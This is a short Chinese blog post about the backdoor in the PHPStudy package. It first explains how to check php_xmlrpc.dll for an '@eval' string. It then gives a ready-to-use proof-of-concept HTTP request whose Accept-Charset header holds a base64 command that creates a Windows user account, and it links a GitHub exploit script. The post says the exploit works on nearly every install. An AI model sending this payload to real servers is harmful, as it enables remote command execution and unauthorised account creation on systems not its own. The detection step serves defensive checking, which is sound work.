PHPstudy后门检测及利用

PHPstudy后门检测
phpstudy被曝存在后门，可以在以下路径检测是否存在后门

php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll

或者

PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dl

用记事本打开此文件，然后搜索@eval字样，如若存在，则说明你的phpstudy存在漏洞。

PHPstudy后门漏洞利用
基本上是通杀。。。

附上POC

GET / HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Accept-Encoding:gzip,deflate
Accept-Charset: c3lzdGVtKCduZXQgdXNlciBhIGEgL2FkZCcpOw==（替换这里base64加密）
Cookie: UM_distinctid=16ae380e49f27e-0987ab403bca49-3c604504-1fa400-16ae380e4a011b; CNZZDATA3801251=cnzz_eid%3D1063495559-1558595034-%26ntime%3D1559102092; CNZZDATA1670348=cnzz_eid%3D213162126-1559207282-%26ntime%3D1559207282
Connection: close

我在GitHub也找到了别人写的脚本，附上链接。

https://github.com/NS-Sp4ce/PHPStudy_BackDoor_Exp

成攻利用截图

posted @ 2020-07-16 17:30 Kn1fe 阅读(423) 评论(0) 编辑收藏举报

刷新页面返回顶部

Kn1fe

PHPstudy后门检测及利用

公告